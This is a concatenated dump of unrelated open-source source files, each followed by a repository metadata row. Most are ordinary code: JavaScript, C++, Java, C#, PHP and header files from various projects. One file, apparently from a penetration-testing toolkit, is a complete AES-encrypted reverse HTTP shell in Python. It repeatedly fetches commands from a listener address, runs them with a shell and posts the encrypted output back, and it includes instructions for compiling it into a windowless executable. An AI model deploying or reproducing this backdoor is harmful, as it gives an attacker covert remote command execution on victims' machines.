this.dispatchEvent(event);
}
_readFile(file, format, encoding) {
if (this.readyState === READY_STATES.LOADING) {
throw new DOMException("The object is in an invalid state.", "InvalidStateError");
}
this.readyState = READY_STATES.LOADING;
setImmediate(() => {
if (this._terminated) {
this._terminated = false;
return;
}
this._fireProgressEvent("loadstart");
let data = file._buffer;
if (!data) {
data = Buffer.alloc(0);
}
this._fireProgressEvent("progress", {
lengthComputable: !isNaN(file.size),
total: file.size,
loaded: data.length
});
setImmediate(() => {
if (this._terminated) {
this._terminated = false;
return;
}
switch (format) {
default:
case "buffer": {
this.result = (new Uint8Array(data)).buffer;
break;
}
case "dataURL": {
let dataUrl = "data:";
const contentType = parseContentType(file.type);
if (contentType && contentType.isText()) {
const fallbackEncoding = whatwgEncoding.getBOMEncoding(data) ||
whatwgEncoding.labelToName(contentType.get("charset")) || "UTF-8";
const decoded = whatwgEncoding.decode(data, fallbackEncoding);
contentType.set("charset", encoding);
dataUrl += contentType.toString();
dataUrl += ",";
dataUrl += querystring.escape(decoded);
} else {
if (contentType) {
dataUrl += contentType.toString();
}
dataUrl += ";base64,";
dataUrl += data.toString("base64");
}
this.result = dataUrl;
break;
}
case "text": {
this.result = whatwgEncoding.decode(data, encoding);
break;
}
}
this.readyState = READY_STATES.DONE;
this._fireProgressEvent("load");
this._fireProgressEvent("loadend");
});
});
}
}
setupForSimpleEventAccessors(FileReaderImpl.prototype, events);
exports.implementation = FileReaderImpl;
| FreezeWarp/freeze-messenger | stress/node_modules/jsdom/lib/jsdom/living/file-api/FileReader-impl.js | JavaScript | gpl-3.0 | 3,919 |
#ifdef NALL_STRING_INTERNAL_HPP
namespace nall {
// "/foo/bar.c" -> "/foo/"
// "/foo/" -> "/foo/"
// "bar.c" -> "./"
string dir(string name) {
for(signed i = name.length(); i >= 0; i--) {
if(name[i] == '/' || name[i] == '\\') {
name.resize(i + 1);
break;
}
if(i == 0) name = "./";
}
return name;
}
// "/foo/bar.c" -> "bar.c"
// "/foo/" -> ""
// "bar.c" -> "bar.c"
string notdir(string name) {
for(signed i = name.length(); i >= 0; i--) {
if(name[i] == '/' || name[i] == '\\') {
return (const char*)name + i + 1;
}
}
return name;
}
// "/foo/bar/baz" -> "/foo/bar/"
// "/foo/bar/" -> "/foo/"
// "/foo/bar" -> "/foo/"
string parentdir(string name) {
unsigned length = name.length(), paths = 0, prev, last;
for(unsigned i = 0; i < length; i++) {
if(name[i] == '/' || name[i] == '\\') {
paths++;
prev = last;
last = i;
}
}
if(last + 1 == length) last = prev; //if name ends in slash; use previous slash
if(paths > 1) name.resize(last + 1);
return name;
}
// "/foo/bar.c" -> "/foo/bar"
string basename(string name) {
for(signed i = name.length(); i >= 0; i--) {
if(name[i] == '/' || name[i] == '\\') break; //file has no extension
if(name[i] == '.') {
name.resize(i);
break;
}
}
return name;
}
// "/foo/bar.c" -> "c"
// "/foo/bar" -> ""
string extension(string name) {
for(signed i = name.length(); i >= 0; i--) {
if(name[i] == '/' || name[i] == '\\') return ""; //file has no extension
if(name[i] == '.') {
return (const char*)name + i + 1;
}
}
return name;
}
string tempname() {
string path = temppath();
srand(time(nullptr));
while(true) {
uint32_t seed = rand();
string filename = {path, ".temporary-", hex<8>(seed)};
if(access(filename, F_OK) != 0) return filename;
}
}
}
#endif
| libretro/bsnes-mercury | nall/string/filename.hpp | C++ | gpl-3.0 | 1,852 |
/*
* Copyright (C) 2014 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.google.android.exoplayer.audio;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.content.IntentFilter;
import android.media.AudioManager;
import com.google.android.exoplayer.util.Assertions;
import com.google.android.exoplayer.util.Util;
/**
* Notifies a listener when the audio playback capabilities change. Call {@link #register} to start
* (or resume) receiving notifications, and {@link #unregister} to stop.
*/
public final class AudioCapabilitiesReceiver {
/**
* Listener notified when audio capabilities change.
*/
public interface Listener {
/**
* Called when the audio capabilities change.
*
* @param audioCapabilities Current audio capabilities for the device.
*/
void onAudioCapabilitiesChanged(AudioCapabilities audioCapabilities);
}
private final Context context;
private final Listener listener;
private final BroadcastReceiver receiver;
/* package */ AudioCapabilities audioCapabilities;
/**
* Constructs a new audio capabilities receiver.
*
* @param context Context for registering to receive broadcasts.
* @param listener Listener to notify when audio capabilities change.
*/
public AudioCapabilitiesReceiver(Context context, Listener listener) {
this.context = Assertions.checkNotNull(context);
this.listener = Assertions.checkNotNull(listener);
this.receiver = Util.SDK_INT >= 21 ? new HdmiAudioPlugBroadcastReceiver() : null;
}
/**
* Registers to notify the listener when audio capabilities change. The current capabilities will
* be returned. It is important to call {@link #unregister} so that the listener can be garbage
* collected.
*
* @return Current audio capabilities for the device.
*/
@SuppressWarnings("InlinedApi")
public AudioCapabilities register() {
Intent stickyIntent = receiver == null ? null
: context.registerReceiver(receiver, new IntentFilter(AudioManager.ACTION_HDMI_AUDIO_PLUG));
audioCapabilities = AudioCapabilities.getCapabilities(stickyIntent);
return audioCapabilities;
}
/**
* Unregisters to stop notifying the listener when audio capabilities change.
*/
public void unregister() {
if (receiver != null) {
context.unregisterReceiver(receiver);
}
}
private final class HdmiAudioPlugBroadcastReceiver extends BroadcastReceiver {
@Override
public void onReceive(Context context, Intent intent) {
if (!isInitialStickyBroadcast()) {
AudioCapabilities newAudioCapabilities = AudioCapabilities.getCapabilities(intent);
if (!newAudioCapabilities.equals(audioCapabilities)) {
audioCapabilities = newAudioCapabilities;
listener.onAudioCapabilitiesChanged(newAudioCapabilities);
}
}
}
}
}
| Lee-Wills/-tv | mmd/library/src/main/java/com/google/android/exoplayer/audio/AudioCapabilitiesReceiver.java | Java | gpl-3.0 | 3,473 |
#!/usr/bin/python
##########################################################################################################################
#
#
# AES Encrypted Reverse HTTP Shell by:
#
# Dave Kennedy (ReL1K)
# http://www.secmaniac.com
#
##########################################################################################################################
#
##########################################################################################################################
#
# To compile, you will need pyCrypto, it's a pain to install if you do it from source, should get the binary modules
# to make it easier. Can download from here:
# http://www.voidspace.org.uk/cgi-bin/voidspace/downman.py?file=pycrypto-2.0.1.win32-py2.5.zip
#
##########################################################################################################################
#
# This shell works on any platform you want to compile it in. OSX, Windows, Linux, etc.
#
##########################################################################################################################
#
##########################################################################################################################
#
# Below is the steps used to compile the binary. py2exe requires a dll to be used in conjunction
# so py2exe was not used. Instead, pyinstaller was used in order to byte compile the binary.
#
##########################################################################################################################
#
# export VERSIONER_PYTHON_PREFER_32_BIT=yes
# python Configure.py
# python Makespec.py --onefile --noconsole shell.py
# python Build.py shell/shell.spec
#
###########################################################################################################################
import urllib
import urllib2
import httplib
import subprocess
import sys
import base64
import os
from Crypto.Cipher import AES
# the block size for the cipher object; must be 16, 24, or 32 for AES
BLOCK_SIZE = 32
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
# secret key, change this if you want to be unique
secret = "Fj39@vF4@54&8dE@!)(*^+-pL;'dK3J2"
# create a cipher object using the random secret
cipher = AES.new(secret)
# TURN THIS ON IF YOU WANT PROXY SUPPORT
PROXY_SUPPORT = "OFF"
# THIS WILL BE THE PROXY URL
PROXY_URL = "http://proxyinfo:80"
# USERNAME FOR THE PROXY
USERNAME = "username"
# PASSWORD FOR THE PROXY
PASSWORD = "password"
# here is where we set all of our proxy settings
if PROXY_SUPPORT == "ON":
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password(realm='RESTRICTED ACCESS',
uri=PROXY_URL, # PROXY SPECIFIED ABOVE
user=USERNAME, # USERNAME SPECIFIED ABOVE
passwd=PASSWORD) # PASSWORD SPECIFIED ABOVE
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
try:
# our reverse listener ip address
address = sys.argv[1]
# our reverse listener port address
port = sys.argv[2]
# except that we didn't pass parameters
except IndexError:
print " \nAES Encrypted Reverse HTTP Shell by:"
print " Dave Kennedy (ReL1K)"
print " http://www.secmaniac.com"
print "Usage: shell.exe <reverse_ip_address> <port>"
sys.exit()
# loop forever
while 1:
# open up our request handelr
req = urllib2.Request('http://%s:%s' % (address,port))
# grab our response which contains what command we want
message = urllib2.urlopen(req)
# base64 unencode
message = base64.b64decode(message.read())
# decrypt the communications
message = DecodeAES(cipher, message)
# quit out if we receive that command
if message == "quit" or message == "exit":
sys.exit()
# issue the shell command we want
proc = subprocess.Popen(message, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# read out the data of stdout
data = proc.stdout.read() + proc.stderr.read()
# encrypt the data
data = EncodeAES(cipher, data)
# base64 encode the data
data = base64.b64encode(data)
# urlencode the data from stdout
data = urllib.urlencode({'cmd': '%s'}) % (data)
# who we want to connect back to with the shell
h = httplib.HTTPConnection('%s:%s' % (address,port))
# set our basic headers
headers = {"User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)","Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
# actually post the data
h.request('POST', '/index.aspx', data, headers)
| firebitsbr/raspberry_pwn | src/pentest/revshells/encrypted_http_shell/shell.py | Python | gpl-3.0 | 5,129 |
using System;
using Android.Graphics.Drawables;
using KeePassLib;
namespace keepass2android
{
/// <summary>
/// Interface for popup menu items in EntryActivity
/// </summary>
internal interface IPopupMenuItem
{
Drawable Icon { get; }
String Text { get; }
void HandleClick();
}
} | red13dotnet/keepass2android | src/keepass2android/EntryActivityClasses/IPopupMenuItem.cs | C# | gpl-3.0 | 293 |
#region netDxf library, Copyright (C) 2009-2018 Daniel Carvajal (haplokuon@gmail.com)
// netDxf library
// Copyright (C) 2009-2018 Daniel Carvajal (haplokuon@gmail.com)
//
// This library is free software; you can redistribute it and/or
// modify it under the terms of the GNU Lesser General Public
// License as published by the Free Software Foundation; either
// version 2.1 of the License, or (at your option) any later version.
//
// The above copyright notice and this permission notice shall be included in all
// copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
// FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
// COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
// IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
// CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#endregion
using System;
using netDxf.Tables;
namespace netDxf.Entities
{
/// <summary>
/// Represents a shape entity.
/// </summary>
public class Shape :
EntityObject
{
#region private fields
private string name;
private ShapeStyle style;
private Vector3 position;
private double size;
private double rotation;
private double obliqueAngle;
private double widthFactor;
private double thickness;
#endregion
#region constructors
/// <summary>
/// Initializes a new instance of the <c>Shape</c> class.
/// </summary>
/// <param name="name">Name of the shape which geometry is defined in the shape <see cref="ShapeStyle">style</see>.</param>
/// <param name="style">Shape <see cref="TextStyle">style</see>.</param>
public Shape(string name, ShapeStyle style) : this(name, style, Vector3.Zero, 1.0, 0.0)
{
}
/// <summary>
/// Initializes a new instance of the <c>Shape</c> class.
/// </summary>
/// <param name="name">Name of the shape which geometry is defined in the shape <see cref="ShapeStyle">style</see>.</param>
/// <param name="style">Shape <see cref="TextStyle">style</see>.</param>
/// <param name="position">Shape insertion point.</param>
/// <param name="size">Shape size.</param>
/// <param name="rotation">Shape rotation.</param>
public Shape(string name, ShapeStyle style, Vector3 position, double size, double rotation) : base(EntityType.Shape, DxfObjectCode.Shape)
{
if (string.IsNullOrEmpty(name))
throw new ArgumentNullException(nameof(name));
this.name = name;
if (style == null)
throw new ArgumentNullException(nameof(style));
this.style = style;
this.position = position;
this.size = size;
this.rotation = rotation;
this.obliqueAngle = 0.0;
this.widthFactor = 1.0;
this.thickness = 0.0;
}
#endregion
#region public properties
/// <summary>
/// Gets the shape name.
/// </summary>
public string Name
{
get { return this.name; }
}
/// <summary>
/// Gets the <see cref="ShapeStyle">shape style</see>.
/// </summary>
public ShapeStyle Style
{
get { return this.style; }
internal set
{
if (value == null)
throw new ArgumentNullException(nameof(value));
this.style = value;
}
}
/// <summary>
/// Gets or sets the shape <see cref="Vector3">insertion point</see> in world coordinates.
/// </summary>
public Vector3 Position
{
get { return this.position; }
set { this.position = value; }
}
/// <summary>
/// Gets or sets the size of the shape.
/// </summary>
/// <remarks>
/// The shape size is relative to the actual size of the shape definition.
/// The size value works as an scale value applied to the dimensions of the shape definition,
/// it cannot be zero and, negative values will invert the shape in the local X and Y axis.<br />
/// Values cannot be zero. Default: 1.0.
/// </remarks>
public double Size
{
get { return this.size; }
set
{
if (MathHelper.IsZero(value))
throw new ArgumentOutOfRangeException(nameof(value), value, "The shape cannot be zero.");
this.size = value;
}
}
/// <summary>
/// Gets or sets the shape rotation in degrees.
/// </summary>
public double Rotation
{
get { return this.rotation; }
set { this.rotation = MathHelper.NormalizeAngle(value); }
}
/// <summary>
/// Gets or sets the shape oblique angle in degrees.
/// </summary>
public double ObliqueAngle
{
get { return this.obliqueAngle; }
set { this.obliqueAngle = MathHelper.NormalizeAngle(value); }
}
/// <summary>
/// Gets or sets the shape width factor.
/// </summary>
/// <remarks>Valid values must be greater than zero. Default: 1.0.</remarks>
public double WidthFactor
{
get { return this.widthFactor; }
set
{
if (value <= 0)
throw new ArgumentOutOfRangeException(nameof(value), value, "The shape width factor must be greater than zero.");
this.widthFactor = value;
}
}
/// <summary>
/// Gets or set the shape thickness.
/// </summary>
public double Thickness
{
get { return this.thickness; }
set { this.thickness = value; }
}
#endregion
#region overrides
public override object Clone()
{
Shape entity = new Shape(this.name, (ShapeStyle)this.style.Clone())
{
//EntityObject properties
Layer = (Layer)this.Layer.Clone(),
Linetype = (Linetype)this.Linetype.Clone(),
Color = (AciColor)this.Color.Clone(),
Lineweight = this.Lineweight,
Transparency = (Transparency)this.Transparency.Clone(),
LinetypeScale = this.LinetypeScale,
Normal = this.Normal,
IsVisible = this.IsVisible,
//Shape properties
Position = this.position,
Size = this.size,
Rotation = this.rotation,
ObliqueAngle = this.obliqueAngle,
Thickness = this.thickness
};
foreach (XData data in this.XData.Values)
entity.XData.Add((XData)data.Clone());
return entity;
}
#endregion
}
}
| virtualrobotix/MissionPlanner | ExtLibs/netDxf/Entities/Shape.cs | C# | gpl-3.0 | 7,298 |
/*
* Copyright 2011-2013 Nikhil Marathe <nsm.nikhil@gmail.com>
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to
* deal in the Software without restriction, including without limitation the
* rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
* sell copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
* FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
* IN THE SOFTWARE.
*/
#include "qhttpresponse.h"
#include <QDateTime>
#include <QLocale>
#include "qhttpserver.h"
#include "qhttpconnection.h"
QHttpResponse::QHttpResponse(QHttpConnection *connection)
// TODO: parent child relation
: QObject(0)
, m_connection(connection)
, m_headerWritten(false)
, m_sentConnectionHeader(false)
, m_sentContentLengthHeader(false)
, m_sentTransferEncodingHeader(false)
, m_sentDate(false)
, m_keepAlive(true)
, m_last(false)
, m_useChunkedEncoding(false)
, m_finished(false)
{
}
QHttpResponse::~QHttpResponse()
{
}
void QHttpResponse::setHeader(const QString &field, const QString &value)
{
if (!m_finished)
m_headers[field] = value;
else
qWarning() << "QHttpResponse::setHeader() Cannot set headers after response has finished.";
}
void QHttpResponse::writeHeader(const char *field, const QString &value)
{
if (!m_finished)
{
m_connection->write(field);
m_connection->write(": ");
m_connection->write(value.toUtf8());
m_connection->write("\r\n");
}
else
qWarning() << "QHttpResponse::writeHeader() Cannot write headers after response has finished.";
}
void QHttpResponse::writeHeaders()
{
if (m_finished)
return;
foreach(const QString &name, m_headers.keys())
{
QString value = m_headers[name];
if (name.compare("connection", Qt::CaseInsensitive) == 0)
{
m_sentConnectionHeader = true;
if (value.compare("close", Qt::CaseInsensitive) == 0)
m_last = true;
else
m_keepAlive = true;
}
else if (name.compare("transfer-encoding", Qt::CaseInsensitive) == 0)
{
m_sentTransferEncodingHeader = true;
if (value.compare("chunked", Qt::CaseInsensitive) == 0)
m_useChunkedEncoding = true;
}
else if (name.compare("content-length", Qt::CaseInsensitive) == 0)
m_sentContentLengthHeader = true;
else if (name.compare("date", Qt::CaseInsensitive) == 0)
m_sentDate = true;
/// @todo Expect case (??)
writeHeader(name.toLatin1(), value.toLatin1());
}
if (!m_sentConnectionHeader)
{
if (m_keepAlive && (m_sentContentLengthHeader || m_useChunkedEncoding))
writeHeader("Connection", "keep-alive");
else
{
m_last = true;
writeHeader("Connection", "close");
}
}
if (!m_sentContentLengthHeader && !m_sentTransferEncodingHeader)
{
if (m_useChunkedEncoding)
writeHeader("Transfer-Encoding", "chunked");
else
m_last = true;
}
// Sun, 06 Nov 1994 08:49:37 GMT - RFC 822. Use QLocale::c() so english is used for month and day.
if (!m_sentDate)
writeHeader("Date", QLocale::c().toString(QDateTime::currentDateTimeUtc(), "ddd, dd MMM yyyy hh:mm:ss") + " GMT");
}
void QHttpResponse::writeHead(int status)
{
if (m_finished)
{
qWarning() << "QHttpResponse::writeHead() Cannot write headers after response has finished.";
return;
}
if (m_headerWritten)
{
qWarning() << "QHttpResponse::writeHead() Already called once for this response.";
return;
}
m_connection->write(QString("HTTP/1.1 %1 %2\r\n").arg(status).arg(STATUS_CODES[status]).toLatin1());
writeHeaders();
m_connection->write("\r\n");
m_headerWritten = true;
}
void QHttpResponse::writeHead(StatusCode statusCode)
{
writeHead(static_cast<int>(statusCode));
}
void QHttpResponse::write(const QByteArray &data)
{
if (m_finished)
{
qWarning() << "QHttpResponse::write() Cannot write body after response has finished.";
return;
}
if (!m_headerWritten)
{
qWarning() << "QHttpResponse::write() You must call writeHead() before writing body data.";
return;
}
m_connection->write(data);
}
void QHttpResponse::end(const QByteArray &data)
{
if (m_finished)
{
qWarning() << "QHttpResponse::end() Cannot write end after response has finished.";
return;
}
if (data.size() > 0)
write(data);
m_finished = true;
emit done();
/// @todo End connection and delete ourselves. Is this a still valid note?
deleteLater();
}
void QHttpResponse::connectionClosed()
{
m_finished = true;
deleteLater();
}
| mkiol/kaktus | sailfish/qhttpserver/qhttpresponse.cpp | C++ | gpl-3.0 | 5,608 |
package org.ovirt.engine.ui.common.widget.uicommon.vm;
import org.ovirt.engine.ui.common.CommonApplicationConstants;
import org.ovirt.engine.ui.common.system.ClientStorage;
import org.ovirt.engine.ui.common.uicommon.model.SearchableTableModelProvider;
import org.ovirt.engine.ui.common.widget.table.column.TextColumnWithTooltip;
import org.ovirt.engine.ui.common.widget.uicommon.AbstractModelBoundTableWidget;
import org.ovirt.engine.ui.uicommonweb.models.vms.VmAppListModel;
import com.google.gwt.event.shared.EventBus;
public class VmAppListModelTable extends AbstractModelBoundTableWidget<String, VmAppListModel> {
public VmAppListModelTable(
SearchableTableModelProvider<String, VmAppListModel> modelProvider,
EventBus eventBus, ClientStorage clientStorage, CommonApplicationConstants constants) {
super(modelProvider, eventBus, clientStorage, false);
}
@Override
public void initTable(CommonApplicationConstants constants) {
TextColumnWithTooltip<String> appNameColumn = new TextColumnWithTooltip<String>() {
@Override
public String getValue(String appName) {
return appName;
}
};
getTable().addColumn(appNameColumn, constants.installedApp());
}
}
| jtux270/translate | ovirt/frontend/webadmin/modules/gwt-common/src/main/java/org/ovirt/engine/ui/common/widget/uicommon/vm/VmAppListModelTable.java | Java | gpl-3.0 | 1,287 |
/*
* Copyright 2018 Google, Inc.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are
* met: redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer;
* redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution;
* neither the name of the copyright holders nor the names of its
* contributors may be used to endorse or promote products derived from
* this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
* A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
* OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
* SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
* LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
* Authors: Gabe Black
*/
#ifndef __SYSTEMC_EXT_DT_BIT_MESSAGES_HH__
#define __SYSTEMC_EXT_DT_BIT_MESSAGES_HH__
namespace sc_core
{
extern const char SC_ID_LENGTH_MISMATCH_[];
extern const char SC_ID_INCOMPATIBLE_TYPES_[];
extern const char SC_ID_CANNOT_CONVERT_[];
extern const char SC_ID_INCOMPATIBLE_VECTORS_[];
extern const char SC_ID_VALUE_NOT_VALID_[];
extern const char SC_ID_ZERO_LENGTH_[];
extern const char SC_ID_VECTOR_CONTAINS_LOGIC_VALUE_[];
extern const char SC_ID_SC_BV_CANNOT_CONTAIN_X_AND_Z_[];
extern const char SC_ID_VECTOR_TOO_LONG_[];
extern const char SC_ID_VECTOR_TOO_SHORT_[];
extern const char SC_ID_WRONG_VALUE_[];
extern const char SC_ID_LOGIC_Z_TO_BOOL_[];
extern const char SC_ID_LOGIC_X_TO_BOOL_[];
} // namespace sc_core
#endif // __SYSTEMC_EXT_DT_BIT_MESSAGES_HH__
| vineodd/PIMSim | GEM5Simulation/gem5/src/systemc/ext/dt/bit/messages.hh | C++ | gpl-3.0 | 2,324 |
<?php
namespace Dotenv\Environment\Adapter;
use PhpOption\None;
class ApacheAdapter implements AdapterInterface
{
/**
* Determines if the adapter is supported.
*
* This happens if PHP is running as an Apache module.
*
* @return bool
*/
public function isSupported()
{
return function_exists('apache_getenv') && function_exists('apache_setenv');
}
/**
* Get an environment variable, if it exists.
*
* This is intentionally not implemented, since this adapter exists only as
* a means to overwrite existing apache environment variables.
*
* @param string $name
*
* @return \PhpOption\Option
*/
public function get($name)
{
return None::create();
}
/**
* Set an environment variable.
*
* Only if an existing apache variable exists do we overwrite it.
*
* @param string $name
* @param string|null $value
*
* @return void
*/
public function set($name, $value = null)
{
if (apache_getenv($name) !== false) {
apache_setenv($name, (string) $value);
}
}
/**
* Clear an environment variable.
*
* @param string $name
*
* @return void
*/
public function clear($name)
{
// Nothing to do here.
}
}
| lejubila/piGardenWeb | vendor/vlucas/phpdotenv/src/Environment/Adapter/ApacheAdapter.php | PHP | gpl-3.0 | 1,361 |
<?php
// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle. If not, see <http://www.gnu.org/licenses/>.
declare(strict_types=1);
namespace core_reportbuilder\external;
use renderer_base;
use core\persistent;
use core\external\persistent_exporter;
use core_reportbuilder\manager;
use core_reportbuilder\datasource;
use core_reportbuilder\form\filter as form_filter;
use core_reportbuilder\local\models\report;
use core_reportbuilder\table\custom_report_table;
use core_reportbuilder\table\custom_report_table_filterset;
use core_reportbuilder\table\custom_report_table_view;
use core_reportbuilder\table\custom_report_table_view_filterset;
use core_reportbuilder\local\helpers\report as report_helper;
/**
* Custom report exporter class
*
* @package core_reportbuilder
* @copyright 2021 David Matamoros <davidmc@moodle.com>
* @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
*/
class custom_report_exporter extends persistent_exporter {
/** @var report The persistent object we will export. */
protected $persistent = null;
/** @var bool */
protected $editmode;
/** @var bool $showeditbutton When showing the report on view.php the Edit button has to be hidden */
protected $showeditbutton;
/** @var string */
protected $download;
/**
* report_exporter constructor.
*
* @param persistent $persistent
* @param array $related
* @param bool $editmode
* @param bool $showeditbutton
* @param string $download
*/
public function __construct(persistent $persistent, array $related = [], bool $editmode = true,
bool $showeditbutton = true, string $download = '') {
parent::__construct($persistent, $related);
$this->editmode = $editmode;
$this->showeditbutton = $showeditbutton;
$this->download = $download;
}
/**
* Return the name of the class we are exporting
*
* @return string
*/
protected static function define_class(): string {
return report::class;
}
/**
* Return a list of objects that are related to the persistent
*
* @return array
*/
protected static function define_related(): array {
return [
];
}
/**
* Return a list of additional properties used only for display
*
* @return array
*/
protected static function define_other_properties(): array {
return [
'table' => ['type' => PARAM_RAW],
'sidebarmenucards' => ['type' => custom_report_menu_cards_exporter::read_properties_definition()],
'conditions' => ['type' => custom_report_conditions_exporter::read_properties_definition()],
'filters' => ['type' => custom_report_filters_exporter::read_properties_definition()],
'sorting' => ['type' => custom_report_columns_sorting_exporter::read_properties_definition()],
'filtersapplied' => ['type' => PARAM_INT],
'filtersform' => [
'type' => PARAM_RAW,
'optional' => true,
],
'editmode' => ['type' => PARAM_INT],
'showeditbutton' => ['type' => PARAM_BOOL],
'javascript' => ['type' => PARAM_RAW],
];
}
/**
* Get additional values to inject while exporting
*
* @param renderer_base $output
* @return array
*/
protected function get_other_values(renderer_base $output): array {
$filtersform = '';
$menucards = [];
if ($this->editmode) {
$table = custom_report_table::create($this->persistent->get('id'));
$table->set_filterset(new custom_report_table_filterset());
} else {
$table = custom_report_table_view::create($this->persistent->get('id'), $this->download);
$table->set_filterset(new custom_report_table_view_filterset());
// Generate filters form if report contains any filters.
$source = $this->persistent->get('source');
/** @var datasource $datasource */
$datasource = new $source($this->persistent);
if (!empty($datasource->get_active_filters())) {
$filtersform = $this->generate_filters_form()->render();
}
}
$report = manager::get_report_from_persistent($this->persistent);
$conditionsexporter = new custom_report_conditions_exporter(null, ['report' => $report]);
$filtersexporter = new custom_report_filters_exporter(null, ['report' => $report]);
$sortingexporter = new custom_report_columns_sorting_exporter(null, ['report' => $report]);
if ($this->editmode) {
$menucardexporter = new custom_report_menu_cards_exporter(null, [
'menucards' => report_helper::get_available_columns($report->get_report_persistent())
]);
$menucards = (array) $menucardexporter->export($output);
}
return [
'table' => $output->render($table),
'sidebarmenucards' => $menucards,
'conditions' => (array) $conditionsexporter->export($output),
'filters' => (array) $filtersexporter->export($output),
'sorting' => (array) $sortingexporter->export($output),
'filtersapplied' => $report->get_applied_filter_count(),
'filtersform' => $filtersform,
'editmode' => (int)$this->editmode,
'showeditbutton' => $this->showeditbutton,
'javascript' => '',
];
}
/**
* Generate filters form for the report
*
* @return form_filter
*/
private function generate_filters_form(): form_filter {
$filtersform = new form_filter(null, null, 'post', '', [], true, [
'reportid' => $this->persistent->get('id'),
'parameters' => json_encode([]),
]);
$filtersform->set_data_for_dynamic_submission();
return $filtersform;
}
}
| michael-milette/moodle | reportbuilder/classes/external/custom_report_exporter.php | PHP | gpl-3.0 | 6,584 |
package net.minecraft.stats;
import com.google.common.collect.Maps;
import com.google.common.collect.Sets;
import com.google.gson.JsonElement;
import com.google.gson.JsonObject;
import com.google.gson.JsonParseException;
import com.google.gson.JsonParser;
import java.io.File;
import java.io.IOException;
import java.lang.reflect.Constructor;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Iterator;
import java.util.Map;
import java.util.Set;
import java.util.Map.Entry;
import net.minecraft.entity.player.EntityPlayer;
import net.minecraft.entity.player.EntityPlayerMP;
import net.minecraft.network.play.server.S37PacketStatistics;
import net.minecraft.server.MinecraftServer;
import net.minecraft.util.ChatComponentTranslation;
import net.minecraft.util.IJsonSerializable;
